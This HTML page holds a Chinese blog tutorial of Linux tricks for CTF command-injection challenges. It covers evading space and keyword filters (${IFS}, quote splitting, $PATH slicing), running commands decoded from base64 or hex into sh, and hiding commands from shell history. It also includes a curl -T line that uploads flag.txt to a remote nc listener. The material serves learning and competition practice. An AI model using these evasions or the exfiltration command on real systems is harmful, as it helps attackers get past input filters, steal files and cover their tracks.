<!DOCTYPE html>
<html lang=en>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>Linux在CTF中的一些小技巧 | Tao&#39;s Blog</title>
  <meta name="description" content="CTF中各种花里胡哨的操作还是挺多的，这里参考大佬的文章，做了更详细的总结！ 场景一：限制空格 假如需要实现 cat flag.txt 命令读取flag：   利用&lt;&gt;重定向符：    利用${IFS}变量(内部域分隔符)：    利用{,}来代替：    利用$IFS$9:   场景二：不允许指定命令执行 假如需要执行 uname 命令，但过滤掉了 uname 字符：   利用参数拼">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux在CTF中的一些小技巧">
<meta property="og:url" content="https://taonn.github.io/2020/10/04/Linux%E5%9C%A8CTF%E4%B8%AD%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%8A%80%E5%B7%A7/index.html">
<meta property="og:site_name" content="Tao&#39;s Blog">
<meta property="og:description" content="CTF中各种花里胡哨的操作还是挺多的，这里参考大佬的文章，做了更详细的总结！ 场景一：限制空格 假如需要实现 cat flag.txt 命令读取flag：   利用&lt;&gt;重定向符：    利用${IFS}变量(内部域分隔符)：    利用{,}来代替：    利用$IFS$9:   场景二：不允许指定命令执行 假如需要执行 uname 命令，但过滤掉了 uname 字符：   利用参数拼">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085145611.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085327815.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085410858.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085455982.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085620660.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085659619.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085835665.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085954623.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203090216583.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203090345359.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203090538453.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203090709704.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203091351029.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203091508479.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203091905836.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203092308561.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203093411601.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203093836873.png">
<meta property="og:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203094014805.png">
<meta property="article:published_time" content="2020-10-04T01:24:32.000Z">
<meta property="article:modified_time" content="2021-03-16T05:28:37.891Z">
<meta property="article:author" content="Bobtaoy">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085145611.png">
  <!-- Canonical links -->
  <link rel="canonical" href="https://taonn.github.io/2020/10/04/Linux%E5%9C%A8CTF%E4%B8%AD%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%8A%80%E5%B7%A7/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Tao&#39;s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 5.2.0"></head>


<body class="main-center" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/Bobtaoy" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">Tao</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">This is me.</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="Search" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="Type something..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav ">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <span class="menu-title">Home</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <span class="menu-title">Archives</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-read">
          <a href="/read">
            
            <span class="menu-title">Read</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <span class="menu-title">Links</span>
          </a>
        </li>
        
      </ul>
      
    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      
  <div class="widget">
    <h3 class="widget-title">Categories</h3>
    <div class="widget-body">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/PHP/">PHP</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Python/">Python</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a><span class="category-list-count">9</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a><span class="category-list-count">6</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a><span class="category-list-count">9</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%83%A1%E4%B9%B1%E5%80%92%E8%85%BE/">胡乱倒腾</a><span class="category-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Archive</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/02/">February 2021</a><span class="archive-list-count">6</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/12/">December 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">November 2020</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">October 2020</a><span class="archive-list-count">14</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/09/">September 2020</a><span class="archive-list-count">3</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a><i class="icon icon-angle-right"></i><a class="category-link" href="/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
              </p>
              <p class="item-title">
                <a href="/2021/02/10/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BPHPCMS-v9-6-1-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" class="title">代码审计之PHPCMS v9.6.1 任意文件读取漏洞分析</a>
              </p>
              <p class="item-date">
                <time datetime="2021-02-10T08:21:17.000Z" itemprop="datePublished">2021-02-10</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a><i class="icon icon-angle-right"></i><a class="category-link" href="/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
              </p>
              <p class="item-title">
                <a href="/2021/02/09/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BPHPCMS%20v9.6.0%20wap%E6%A8%A1%E5%9D%97SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" class="title">代码审计之PHPCMSv9.6.0 wap模块SQL注入漏洞分析</a>
              </p>
              <p class="item-date">
                <time datetime="2021-02-09T10:55:00.000Z" itemprop="datePublished">2021-02-09</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a><i class="icon icon-angle-right"></i><a class="category-link" href="/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
              </p>
              <p class="item-title">
                <a href="/2021/02/07/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BPHPCMSV9-6-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" class="title">代码审计之PHPCMS_V9.6.0任意文件上传漏洞分析</a>
              </p>
              <p class="item-date">
                <time datetime="2021-02-07T01:39:31.000Z" itemprop="datePublished">2021-02-07</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a><i class="icon icon-angle-right"></i><a class="category-link" href="/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
              </p>
              <p class="item-title">
                <a href="/2021/02/06/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BPHPCMSV9-2%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" class="title">代码审计之PHPCMS_V9.2任意文件上传getshell漏洞分析</a>
              </p>
              <p class="item-date">
                <time datetime="2021-02-06T11:10:11.000Z" itemprop="datePublished">2021-02-06</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a><i class="icon icon-angle-right"></i><a class="category-link" href="/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
              </p>
              <p class="item-title">
                <a href="/2021/02/02/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BBlueCMS-V1-6/" class="title">代码审计之BlueCMS_V1.6</a>
              </p>
              <p class="item-date">
                <time datetime="2021-02-02T13:35:01.000Z" itemprop="datePublished">2021-02-02</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<aside class="sidebar sidebar-toc collapse" id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    <nav id="toc" class="article-toc">
      <h3 class="toc-title">Catalogue</h3>
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9C%BA%E6%99%AF%E4%B8%80%EF%BC%9A%E9%99%90%E5%88%B6%E7%A9%BA%E6%A0%BC"><span class="toc-number">1.</span> <span class="toc-text">场景一：限制空格</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9C%BA%E6%99%AF%E4%BA%8C%EF%BC%9A%E4%B8%8D%E5%85%81%E8%AE%B8%E6%8C%87%E5%AE%9A%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-number">2.</span> <span class="toc-text">场景二：不允许指定命令执行</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9C%BA%E6%99%AF%E4%B8%89%EF%BC%9A%E4%B8%80%E6%AC%A1%E6%89%A7%E8%A1%8C%E5%A4%9A%E6%9D%A1%E5%91%BD%E4%BB%A4"><span class="toc-number">3.</span> <span class="toc-text">场景三：一次执行多条命令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="toc-number">4.</span> <span class="toc-text">命令编码绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E6%9B%BF%E6%8D%A2"><span class="toc-number">5.</span> <span class="toc-text">字符替换</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#curl-T-%E4%B8%8A%E4%BC%A0%E6%96%87%E4%BB%B6"><span class="toc-number">6.</span> <span class="toc-text">curl -T 上传文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%98%B2%E6%AD%A2%E5%91%BD%E4%BB%A4%E8%A2%AB%E8%AE%B0%E5%BD%95"><span class="toc-number">7.</span> <span class="toc-text">防止命令被记录</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">8.</span> <span class="toc-text">利用文件名执行命令</span></a></li></ol>
    </nav>
  </div>
</aside>

<main class="main" role="main">
  <div class="content">
  <article id="post-Linux在CTF中的一些小技巧" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      Linux在CTF中的一些小技巧
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2020/10/04/Linux%E5%9C%A8CTF%E4%B8%AD%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%8A%80%E5%B7%A7/" class="article-date">
	  <time datetime="2020-10-04T01:24:32.000Z" itemprop="datePublished">2020-10-04</time>
	</a>
</span>
        
  <span class="article-category">
    <i class="icon icon-folder"></i>
    <a class="article-category-link" href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a>
  </span>

        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link-link" href="/tags/CTF/" rel="tag">CTF</a>
  </span>


        

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2020/10/04/Linux%E5%9C%A8CTF%E4%B8%AD%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%8A%80%E5%B7%A7/#comments" class="article-comment-link">Comments</a></span>
        
	
		<span class="post-wordcount hidden-xs" itemprop="wordCount">Word Count: 690(words)</span>
	
	

      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <p>CTF中各种花里胡哨的操作还是挺多的，这里参考大佬的文章，做了更详细的总结！</p>
<h2 id="场景一：限制空格"><a href="#场景一：限制空格" class="headerlink" title="场景一：限制空格"></a>场景一：限制空格</h2><p> 假如需要实现 <strong>cat flag.txt</strong> 命令读取flag： </p>
<ol>
<li>利用&lt;&gt;重定向符：</li>
</ol>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085145611.png" alt="image-20191203085145611"></p>
<ol start="2">
<li>利用${IFS}变量(内部域分隔符)：</li>
</ol>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085327815.png" alt="image-20191203085327815"></p>
<ol start="3">
<li>利用{,}来代替：</li>
</ol>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085410858.png" alt="image-20191203085410858"></p>
<ol start="4">
<li>利用$IFS$9:</li>
</ol>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085455982.png" alt="image-20191203085455982"></p>
<h2 id="场景二：不允许指定命令执行"><a href="#场景二：不允许指定命令执行" class="headerlink" title="场景二：不允许指定命令执行"></a>场景二：不允许指定命令执行</h2><p> 假如需要执行 <strong>uname</strong> 命令，但过滤掉了 uname 字符： </p>
<ol>
<li>利用参数拼接（黑名单绕过）：</li>
</ol>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085620660.png" alt="image-20191203085620660"></p>
<ol start="2">
<li><p>利用’ “  单、双引号（碰到 escapeshellcmd() 时有效bypass）： </p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085659619.png" alt="image-20191203085659619"></p>
</li>
</ol>
<p>单、双引号成对出现不过滤，表示空字符串；</p>
<ol start="3">
<li>利用 <strong>`</strong> 小引号，就是Tab上那个引号：</li>
</ol>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085835665.png" alt="image-20191203085835665"></p>
<p>如果一串命令中存在``，会先执行引号内的命令；</p>
<p>这也就是利用DNS传数据的利用点；</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203085954623.png" alt="image-20191203085954623"></p>
<ol start="4">
<li>利用转义符号\反斜杠来绕过</li>
</ol>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203090216583.png" alt="image-20191203090216583"></p>
<h2 id="场景三：一次执行多条命令"><a href="#场景三：一次执行多条命令" class="headerlink" title="场景三：一次执行多条命令"></a>场景三：一次执行多条命令</h2><p>假如需要执行uname和id命令：</p>
<ol>
<li><p>利用shell脚本结束符; 分号：</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203090345359.png" alt="image-20191203090345359"></p>
</li>
<li><p>利用逻辑符号(&amp;,&amp;&amp;,|,||)</p>
</li>
</ol>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203090538453.png" alt="image-20191203090538453"></p>
<ol start="2">
<li>在Web页面执行时可以利用回车的url编码 <strong>%0a</strong> 来绕过 </li>
</ol>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203090709704.png" alt="image-20191203090709704"></p>
<p>类似在shell脚本下放了两条命令</p>
<h2 id="命令编码绕过"><a href="#命令编码绕过" class="headerlink" title="命令编码绕过"></a>命令编码绕过</h2><p><strong>base64</strong>:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">root@Tao:/tmp<span class="comment"># printf &quot;whoami&quot; | base64</span></span><br><span class="line">d2hvYW1p</span><br><span class="line">root@Tao:/tmp<span class="comment"># printf &quot;d2hvYW1p&quot; | base64 -d | sh</span></span><br><span class="line">root</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203091351029.png" alt="image-20191203091351029"></p>
<p><strong>xxd（16进制）</strong>：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">root@Tao:/tmp<span class="comment"># printf &quot;whoami&quot; | xxd -p</span></span><br><span class="line">77686f616d69</span><br><span class="line">root@Tao:/tmp<span class="comment"># printf &quot;77686f616d69&quot; | xxd -r -p | sh</span></span><br><span class="line">root</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203091508479.png" alt="image-20191203091508479"></p>
<h2 id="字符替换"><a href="#字符替换" class="headerlink" title="字符替换"></a>字符替换</h2><p>Linux</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">root@Tao:/tmp<span class="comment"># echo $PATH</span></span><br><span class="line">/usr/<span class="built_in">local</span>/sbin:/usr/<span class="built_in">local</span>/bin:/usr/sbin:/usr/bin:/sbin:/bin</span><br><span class="line">root@Tao:/tmp<span class="comment"># echo $&#123;PATH:5:1&#125;</span></span><br><span class="line">l</span><br><span class="line">root@Tao:/tmp<span class="comment"># echo $&#123;PATH:2:1&#125;</span></span><br><span class="line">s</span><br><span class="line">root@Tao:/tmp<span class="comment"># echo $&#123;PATH:5:1&#125;$&#123;PATH:2:1&#125;</span></span><br><span class="line">ls</span><br><span class="line">root@Tao:/tmp<span class="comment"># $&#123;PATH:5:1&#125;$&#123;PATH:2:1&#125;</span></span><br><span class="line">flag.txt  tao.sh</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203091905836.png" alt="image-20191203091905836"></p>
<p> Linux：${PATH~: a :b}    其中a表示从a位开始，b表示截取的长度； （从0开始！！！）</p>
<p>如果过滤了冒号:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">root@Tao:/tmp<span class="comment"># echo $(expr substr $PATH 6 1)</span></span><br><span class="line">l</span><br><span class="line">root@Tao:/tmp<span class="comment"># echo $(expr substr $PATH 3 1)</span></span><br><span class="line">s</span><br><span class="line">root@Tao:/tmp<span class="comment"># $(expr substr $PATH 6 1)$(expr substr $PATH 3 1)</span></span><br><span class="line">flag.txt  tao.sh</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203092308561.png" alt="image-20191203092308561"></p>
<p><strong>Windows:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">E:\tmp&gt;echo %PATH%:~13,1</span><br><span class="line">C:\Program Files (x86)\....</span><br><span class="line">E:\tmp&gt;echo %PATH:~14,1%</span><br><span class="line">e</span><br></pre></td></tr></table></figure>

<p> Windows：%PATH:~a,b%  (从1开始数)</p>
<h2 id="curl-T-上传文件"><a href="#curl-T-上传文件" class="headerlink" title="curl -T 上传文件"></a>curl -T 上传文件</h2><p>首先，windows主机监听端口</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">E:\tmp&gt;nc.exe -l -v -p 2333</span><br></pre></td></tr></table></figure>

<p>Linux服务器发送文件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -T .&#x2F;flag.txt http:&#x2F;&#x2F;1.1.1.1:2333</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203093411601.png" alt="image-20191203093411601"></p>
<h2 id="防止命令被记录"><a href="#防止命令被记录" class="headerlink" title="防止命令被记录"></a>防止命令被记录</h2><p>在终端执行的每一条命令都会被记录在 history 文件中？</p>
<p>不是的，如果在命令前加个<code>空格</code>，则会不被记录；</p>
<p>并且前后重复的命令不会被记录；</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203093836873.png" alt="image-20191203093836873"></p>
<p>note：</p>
<p>debain系可以，centos系不行；</p>
<h2 id="利用文件名执行命令"><a href="#利用文件名执行命令" class="headerlink" title="利用文件名执行命令"></a>利用文件名执行命令</h2><p> <code>*</code>是Linux下的通配符，它会将符合模式的文件列出来，之后执行； </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">root@Tao:/tmp<span class="comment"># ls</span></span><br><span class="line">root@Tao:/tmp<span class="comment"># touch bash</span></span><br><span class="line">root@Tao:/tmp<span class="comment"># echo id &gt;&gt; tao.bash</span></span><br><span class="line">root@Tao:/tmp<span class="comment"># ls</span></span><br><span class="line">bash  tao.bash</span><br><span class="line">root@Tao:/tmp<span class="comment"># *</span></span><br><span class="line">uid=0(root) gid=0(root) 缁�=0(root)</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20191203094014805.png" alt="image-20191203094014805"></p>
<p>参考文章:  <a target="_blank" rel="noopener" href="https://ai-sewell.me/2017/Some-tricks-of-Linux-in-CTF/">https://ai-sewell.me/2017/Some-tricks-of-Linux-in-CTF/</a></p>

      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="https://taonn.github.io/2020/10/04/Linux%E5%9C%A8CTF%E4%B8%AD%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%8A%80%E5%B7%A7/" title="Linux在CTF中的一些小技巧" target="_blank" rel="external"><font color="red">Linux在CTF中的一些小技巧</font></a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/Bobtaoy" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/Bobtaoy" target="_blank"><span class="text-dark">Tao</span><small class="ml-1x">This is me.</small></a></h3>
        <div>慢慢走会比较快</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    <li class="prev">
      <a href="/2020/10/04/Python3-argparse%E6%A8%A1%E5%9D%97%E7%AE%80%E8%A6%81%E4%BD%BF%E7%94%A8/" title="Python3--argparse模块简要使用"><i class="icon icon-angle-left" aria-hidden="true"></i><span>&nbsp;&nbsp;Newer</span></a>
    </li>
    
    
    <li class="next">
      <a href="/2020/10/04/MD5%E5%8A%A0%E5%AF%86%E5%90%8E%E7%9A%84SQL%E6%B3%A8%E5%85%A5-%E9%AA%9A%E6%93%8D%E4%BD%9C/" title="MD5加密后的SQL注入(骚操作)"><span>Older&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
    <li class="toggle-toc">
      <a class="toggle-btn collapsed" data-toggle="collapse" href="#collapseToc" aria-expanded="false" title="Catalogue" role="button">
        <span>[&nbsp;</span><span>Catalogue</span>
        <i class="text-collapsed icon icon-anchor"></i>
        <i class="text-in icon icon-close"></i>
        <span>]</span>
      </a>
    </li>
    
  </ul>
  
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  


</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
    <div class="copyright">
    	
        &copy; 2021 Tao.
        
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
